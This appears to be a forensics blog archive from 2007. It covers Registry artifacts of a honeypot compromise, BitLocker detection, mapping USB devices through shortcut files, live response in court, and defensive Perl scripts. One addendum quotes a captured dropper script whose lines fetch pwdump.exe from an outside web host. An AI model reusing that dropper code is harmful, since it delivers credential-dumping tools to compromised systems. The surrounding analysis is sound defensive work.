Is this really such an issue, something you should be concerned about when performing IR or conducting an investigation? Let me add some perspective...not long ago, I examined a worm that had infected several systems, and it created an entry for itself in the RunOnce key; the entry was prepended with a "*". Does anyone get the significance of that?

Saturday, April 28, 2007

Something New To Look For

Over on the Windows Forensic Analysis group, Hogfly mentioned something he'd found in a honeypot that had been compromised by the MS DNS exploit...a script that modified several values within the following Registry key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PCHealth\ErrorReporting

The values modified include:

AllOrNone
DoReport
IncludeKernelFaults
IncludeMicrosoftApps
IncludeWindowsApps
IncludeShutdownErrs
ShowUI

So, what's this all about? Remember how some malware tries to shut off AV software or the Windows Firewall? Well, the script that Hogfly found uses reg.exe to set all of the values (except the first one) to 0, and effectively shuts down any error reporting, which is essentially a visual notification that something is wrong on the system.

When performing IR or CF Registry analysis, this is another place to look regarding issues on a system following an intrusion or compromise. If nothing else, this sort of information can provide you with some insight as to the technical sophistication of the attacker or malware author.
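
As a quick live-response check, something like the following sketch (using the Win32::TieRegistry module, run locally on the system in question) will dump the values listed above so you can see whether they've been zeroed out:

#! c:\perl\bin\perl.exe
# errchk.pl - sketch: dump the ErrorReporting values and flag any that have
# been set to 0 (i.e., error reporting shut off).
use strict;
use Win32::TieRegistry (Delimiter => "/");

my $path = "LMachine/SOFTWARE/Microsoft/PCHealth/ErrorReporting/";
my $key  = $Registry->{$path} || die "Could not open $path\n";

foreach my $val (qw/AllOrNone DoReport IncludeKernelFaults IncludeMicrosoftApps
                    IncludeWindowsApps IncludeShutdownErrs ShowUI/) {
    my $data = $key->{"/" . $val};
    if (defined $data) {
        my $dword = hex($data);     # REG_DWORD data comes back as a hex string
        printf "%-22s = %d%s\n", $val, $dword, ($dword == 0) ? "   <-- check this" : "";
    }
    else {
        printf "%-22s : not set\n", $val;
    }
}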

Addendum, 29 Apr: From Hogfly's updated post on the analysis of the honeypot: here's an extract from a .vbs script that was created on the system:

echo Set xPost = CreateObject("Microsoft.XMLHTTP")>>get.vbs
echo xPost.Open "GET","http://www.dit.net/images/pwdump.exe",0 >>get.vbs

These lines make the resulting script work like a dropper, reaching out to another site and grabbing a file. Under the hood, the script uses the WinInet API (the "GET" functionality, specifically), which will leave other artifacts on the system; specifically, you will see web browser history (ie, Temporary Internet Files) for the "Default User". Robert Hensing has an excellent write-up on this phenomenon; in a nutshell, whenever the WinInet API functions are executed from a System-level account, the TIF history appears within the "Default User" profile.
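
A quick way to check for this artifact on a live XP system (or against a mounted image...adjust the drive letter and path accordingly) is simply to look for content under the Default User profile's Temporary Internet Files; the path below assumes a default XP install.

#! c:\perl\bin\perl.exe
# duser.pl - sketch: look for browser history beneath the "Default User"
# profile, which normally shouldn't be there; its presence suggests WinInet
# activity from a System-level account.
use strict;

my $tif = 'C:\Documents and Settings\Default User\Local Settings' .
          '\Temporary Internet Files\Content.IE5';

if (-d $tif) {
    print "Found: $tif\n";
    opendir(DIR, $tif) || die "Could not open $tif: $!\n";
    my @entries = grep { !/^\.\.?$/ } readdir(DIR);
    closedir(DIR);
    print "  $_\n" foreach (@entries);
}
else {
    print "No Default User TIF content found.\n";
}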

Links
Error Reporting Policies and Advanced Features
BitCruncher Script for Annoyances

Tuesday, April 17, 2007

WFA Sample Chapter

I wanted to point out to the readers of this blog that Syngress/Elsevier has a sample chapter of my book available online for free download. The sample chapter is chapter 3, Windows Memory Analysis.

I point this out because I've received questions via a number of forums about the content...questions like, "how will this book help me?" and "will this book teach me anything new?"

...and I thought Troy Larson's quote would've been enough to sell the book to the blind!

If you download the chapter, or purchase the book, I'd greatly appreciate comments...regarding content, etc.

Thanks!

Sunday, April 15, 2007

Drive Encryption

One of the challenges posed by Vista to traditional forensic analysis is the use of BitLocker to encrypt data on the hard drive. However, this really isn't any different from other similar technologies such as PGP, etc., that already allow encryption of files, partitions, or drives.

The response to encountering active drive encryption, particularly when dealing with an uncooperative suspect, should be to acquire a live image of the system hard drive. In many cases, powering off the system and removing the hard drive may result in encrypted data being imaged, and until we get some kind of instantaneous image translation technology, that would be a "Bad Thing" for analysts.

So, when approaching a system, how does one tell whether or not there's any drive encryption in use? Well, Hogfly wrote an excellent WMI VBS script for detecting BitLocker. Using Perl, you could implement this script and then "compile" it into a standalone EXE and run it from a CD prior to imaging.
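
Something along these lines...here's a rough Perl sketch of the same idea, using Win32::OLE to query the Win32_EncryptableVolume WMI class (Vista only, and it needs to be run with admin rights). Treat the namespace and the ProtectionStatus values (0 = off, 1 = on, 2 = unknown) as items to verify against the MS documentation before relying on this.

#! c:\perl\bin\perl.exe
# btlkr.pl - sketch: check each volume's BitLocker protection status via
# the Win32_EncryptableVolume class.
use strict;
use Win32::OLE qw(in);

my $wmi = Win32::OLE->GetObject(
    "winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\CIMV2\\Security\\MicrosoftVolumeEncryption")
    || die "WMI connection failed (not Vista, or not admin?): " . Win32::OLE->LastError() . "\n";

my %status = (0 => "Unprotected", 1 => "Protected", 2 => "Unknown");
foreach my $vol (in $wmi->InstancesOf("Win32_EncryptableVolume")) {
    printf "%s : %s\n", $vol->{DriveLetter},
        $status{$vol->{ProtectionStatus}} || $vol->{ProtectionStatus};
}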

At this point, all we'd need to do is come up with other "signatures" for drive encryption that we can look for. Using a checklist of visible references to look for on the screen, combined with a small applet that could be run from a CD to tell the responder (ie, LEO, etc.) whether drive encryption was active and in use, would likely be the best approach.

Thoughts?

Monday, April 09, 2007

From the Lab: Mapping USB devices via LNK files

My first "From the Lab" post will be to address something I see regularly in forums; how does one tie a specific USB-connected device to a Windows system using shortcut (LNK) files, given nothing more than an acquired image to work with? We know that we can extract information about USB devices that have been connected to a system using nothing more than the raw System Registry file...we can get the devices, any drive letters they were mapped to, as well as the date that they were last connected to the system. However, often times we'll have some shortcut files in an image that will point to specific files...images, documents, etc...that we may be interested in, and the drive letter will be F:\ or G:\, or something else that is not part of the system (either as physical or logical drive) that we acquired the image from. So the question is, how do we map the shortcut file to the specific device?

Well, the first thought would be to go to the MountedDevices key and see which devices were mounted as specific drive letters. We know that the binary data for a specific DosDevice entry will contain a reference that looks like "\??\STORAGE\RemovableMedia", followed by the ParentIdPrefix of the device. So, if we have a shortcut file that contains the path "F:\malware.exe", and we know that the device called "\DosDevices\F:" points to a removable storage device, we can then use the ParentIdPrefix value to map back to the USB device found beneath the Enum\USBStor key.

Remember: the ParentIdPrefix value is NOT the device serial number!!
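
Just as an illustration of the mapping, here's a snippet that takes the raw binary data from a \DosDevices\F: value (however you've extracted it...regp.pl, a hive viewer, etc.), decodes the UTF-16LE device string, and pulls out the ParentIdPrefix. The device string used below is made up for the example.

#! c:\perl\bin\perl.exe
# Sketch: decode a MountedDevices \DosDevices\ value and extract the
# ParentIdPrefix, which can then be mapped back to the Enum\USBStor entries.
use strict;

# hypothetical value data: a UTF-16LE device string, built here for the example
my $ascii = "\\??\\STORAGE#RemovableMedia#7&326659cd&0&RM#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}";
my $data  = join("", map { $_ . "\x00" } split(//, $ascii));

(my $str = $data) =~ s/\x00//g;           # crude UTF-16LE -> ASCII
if ($str =~ /STORAGE[#\\]RemovableMedia[#\\](.+?)&RM/i) {
    print "ParentIdPrefix: $1\n";
}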

But what happens if you find that multiple USB devices have been connected to the system, and several of them have been mapped to the F:\ drive letter? How do you determine which device was connected when the shortcut was created? Well, to find out, I decided to run a little experiment...

Here's how the experiment works...I plug a GeekSquad 1GB thumb drive into my laptop, and when the drive is created (F:\), I open it and create a shortcut to an application or file on the thumb drive. The shortcut goes on my desktop. This is meant to simulate shortcuts created by files on the thumb drive being accessed/opened, and the shortcut (.lnk) files being created in the Recent folder.

The first thing I did was run secinspect.exe (with the "-n" switch to avoid the hex dumps). As the thumb drive is not a disk, per se, I do not get a disk signature.

Next, I ran ldi.exe, a tool I wrote that is available on the DVD that accompanies my book (located in the ch1\code\Tools directory). This tool uses WMI (the Perl source code is available on the DVD, as well), specifically the Win32_LogicalDisk class, to get the volume serial number from the device (Note: the Win32_PhysicalMedia class returns the manufacturer's serial number for hard drives). Running ldi.exe with the "-c" switch to obtain the .csv format output, I get:

F:\,Removable,,1B360101,FAT,,961.875 MB

Basically, this says that the F:\ drive is identified by Windows (XP SP2, in this case) as being a removable disk, with volume serial number 1B36-0101. The device is formatted FAT, and is approximately 1GB.

Ah, the volume serial number. Very cool! What is the volume serial number, or VSN? The VSN is a value that is calculated, based in part on the current date and time, when the partition is formatted, and added to the boot sector. For all intents and purposes, it should be a unique value, specific to the device, although it can be modified. This Usenet post provides some insight as to how the VSN is created on Win95.
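
For reference, the core of what ldi.exe does can be sketched in just a few lines of Perl using Win32::OLE and the Win32_LogicalDisk class (this is a stripped-down illustration, not the tool from the DVD):

#! c:\perl\bin\perl.exe
# vsn.pl - sketch: list each logical disk with its drive type, volume
# serial number, and file system via WMI.  DriveType 2 = removable.
use strict;
use Win32::OLE qw(in);

my $wmi = Win32::OLE->GetObject("winmgmts:\\\\.\\root\\cimv2")
    || die "WMI connection failed: " . Win32::OLE->LastError() . "\n";

foreach my $disk (in $wmi->InstancesOf("Win32_LogicalDisk")) {
    printf "%s,%s,%s,%s\n",
        $disk->{DeviceID},
        ($disk->{DriveType} == 2) ? "Removable" : $disk->{DriveType},
        defined($disk->{VolumeSerialNumber}) ? $disk->{VolumeSerialNumber} : "",
        defined($disk->{FileSystem})         ? $disk->{FileSystem}         : "";
}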

I verified the volume serial number using "chkdsk f:", and got:

Volume Serial Number is 1B36-0101

It is important to note that this experiment is being run against a USB-connected thumb drive, which happens to be formatted FAT. The volume serial number appears to be located in the 4 bytes starting at offset 0x027 within the boot sector of the (first) primary partition. According to the MS TechNet article How NTFS Works, the volume serial number for a partition formatted NTFS is an 8-byte value located at offset 0x48 of the boot sector.

The commands "fsutil fsinfo volumeinfo F:" and "vol F:" return the same information as the chkdsk command.

Using a tool based on Jesse Hager's Windows shortcut file format documentation (ie, lslnk.exe found in the ch5\code directory on the book DVD), we see that the shortcut file also includes that volume serial number:

Shortcut file is on a local volume.
Volume Name =
Volume Type = Removable
Volume SN = 0x1b360101

Okay, so far, so good. In most cases, however, you may not have the actual thumb drive available, for whatever reason. So how're you going to map the shortcut file to the specific device that appears in the USBStor key within the Registry? We already know how to map the USBStor key entry to the drive letter that it was mapped to...but that only works if we assume that another device wasn't attached to the system and mapped to the same drive letter at some later point in time. But if you do not have the thumb drive, is the volume serial number useful? It doesn't appear to be so, as the volume serial number does not seem to be stored in any location (key or value) within the Registry that I can locate at this time. This may be by design, as a thumb drive can be reformatted and given a different volume serial number, but be the same device and have the same unique instance ID (serial number from the device descriptor). I even checked the disk_install and volume_install entries within the setupapi.log file, and found no specific reference to the volume serial number at all.

So, as of yet, there does not appear to be any way to map from the info in a shortcut file (ie, drive letter and volume serial number) to the specific thumb drive, without having that thumb drive available. An alternative would be to map time-based information from artifacts (MAC times on the shortcut file, on Prefetch files, associated with other Registry entries) to the time-based information regarding when the device was last connected to the system.

If anyone has any other information that they'd like to share about this issue, it would be greatly appreciated.

Resources:
Windows 2000: Disk Concepts and Troubleshooting
MS TechNet: How FAT Works
Understanding Disk Volume Tracking in Windows 95

Great news for IR and live response!

There was some great news recently for IR and live response!

Over the past couple of years, when discussing the viability and usefulness of live response, particularly as a source of evidence to be used in court, I have very often heard folks say, "I won't perform live response until there is case law to support its use."

Is it just me, or does this sound like a chicken-or-the-egg thing? How can something be accepted in court if you're not willing to do the work and bring it into court in the first place? After all, look at everything that is used in court as evidence now, but at one time wasn't...fingerprints, DNA, even computer forensic evidence.

I was reading the TaoSecurity blog post regarding the Heckencamp case, and came across something interesting...that the court accepted a sysadmin's actions of logging into Heckencamp's computer to definitively determine that it was, in fact, the system being used to attack a mail server.

The Wired story mentions things like "counter-crack" and "counter-hacking", and I shudder at the use of both terms. The court's ruling includes a lot of discussion about expectation of privacy, but also includes such things as the fact that the sysadmin wasn't acting as an agent of law enforcement, but instead was acting to preserve the integrity of the mail server that was under attack. Basically, from what I can see in the opinion, the sysadmin confirmed that the system was used to attack the mail server by examining "network logs" and "after approximately 15 minutes of looking only in the temporary directory, without deleting, modifying, or destroying any files, Savoy [the sysadmin] logged off of the computer."

Okay, if anyone believes that nothing was modified in 15 minutes...well, that's a discussion for another time. After all, in order to access "network logs", a file would have had to have been accessed, modifying the last access time of the file...logging into the system itself would have modified logs, the contents of memory, etc...but I digress.

The Wired article ends in a monologue about vigilantism and student privacy, but that's not what I'm seeing here or interested in at all. Sure, the sysadmin used a username and password from a previous portion of his "investigation" to access Heckencamp's system, and the ethics of this can be argued until the cows come home. However, what I'm seeing is that live response may be starting to gain acceptance in court. If a sysadmin can log into a system and muck about for 15 minutes, why can't someone with a detailed process access a live system, collect necessary evidence as part of a thoroughly documented methodology, and then use that evidence in court?

Sunday, April 08, 2007

Interesting Tool - SecInspect

Now that my book has been released, I'll be posting updates, errata, and comments here in this blog. Some of the updates will include things such as tool updates, as well as "From the Lab" entries (sort of mini-HowTos), comments, reader questions, etc.

One interesting tool I ran across recently on HogFly's ForensicIR blog is something new from Microsoft called "Sector Inspector". Secinspect.exe is a command line tool (ie, great for IR and live response!!) that lets the sysadmin view things such as a list of physical devices, drive geometries, disk signature and volume serial number, etc. Now much of this is available through WMI classes such as Win32_PhysicalMedia, but secinspect.exe may be much easier for many folks to use, particularly if you want to include it as part of your drive documentation process (ie, hook up a drive to your write-blocker and then collect data on it using secinspect.exe prior to or immediately after acquiring an image).

An excerpt of what secinspect.exe collected when run on my own system:

Target - \\.\PHYSICALDRIVE1
14593 Cylinders
255 Heads
63 Sectors Per Track
512 BytesPerSector
12 MediaType
[snip]
Disk Signature 0x96244465

Also, for each partition, you see information such as:

SerialNumber : 10675897970943624920

Note: You can also use this with USB thumb drives.
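
As an aside, some of the same items can be pulled via WMI from Perl...here's a rough sketch using the Win32_DiskDrive (disk signature) and Win32_PhysicalMedia (manufacturer's serial number, XP and later) classes; property availability varies by platform.

#! c:\perl\bin\perl.exe
# disksig.pl - sketch: pull the disk signature and manufacturer's serial
# number for each physical drive via WMI.
use strict;
use Win32::OLE qw(in);

my $wmi = Win32::OLE->GetObject("winmgmts:\\\\.\\root\\cimv2")
    || die "WMI connection failed: " . Win32::OLE->LastError() . "\n";

foreach my $disk (in $wmi->InstancesOf("Win32_DiskDrive")) {
    printf "%s  Signature: 0x%08X\n", $disk->{DeviceID},
        defined($disk->{Signature}) ? $disk->{Signature} : 0;
}

foreach my $media (in $wmi->InstancesOf("Win32_PhysicalMedia")) {
    printf "%s  SerialNumber: %s\n", $media->{Tag},
        defined($media->{SerialNumber}) ? $media->{SerialNumber} : "";
}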

Cool stuff!

Monday, April 02, 2007

Using Perl in Forensics

Ever wondered how some folks use Perl in their jobs, particularly when performing computer forensic analysis? I'm always interested to see how folks use Perl, particularly because I use it so much.

I recently ran across a Perl script from Citadel Systems for extracting time zone information from an image. Interestingly enough, it uses my own Offline Registry Parser (regp.pl), which is available on the DVD with my book as well as on my SourceForge.net site.

Pretty cool, eh? I think that it's nice to get this kind of feedback...that someone found something you wrote to be useful enough to use it or replicate it.
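
If you'd like to roll your own quick version of that kind of check, here's a rough sketch of the same idea...run regp.pl against a System hive and pull out the lines around the TimeZoneInformation key. The exact regp.pl output format (and which ControlSet was current on the system) will vary, so treat this as a starting point rather than a finished tool.

#! c:\perl\bin\perl.exe
# tz.pl - sketch: run the Offline Registry Parser against a System hive and
# dump the lines around the TimeZoneInformation key.  Assumes regp.pl is in
# the current directory.
use strict;

my $hive = shift || die "You must enter the path to a System hive file.\n";
my $show = 0;
foreach my $line (`perl regp.pl $hive`) {
    $show = 20 if ($line =~ /TimeZoneInformation/i);   # dump the next ~20 lines
    if ($show > 0) {
        print $line;
        $show--;
    }
}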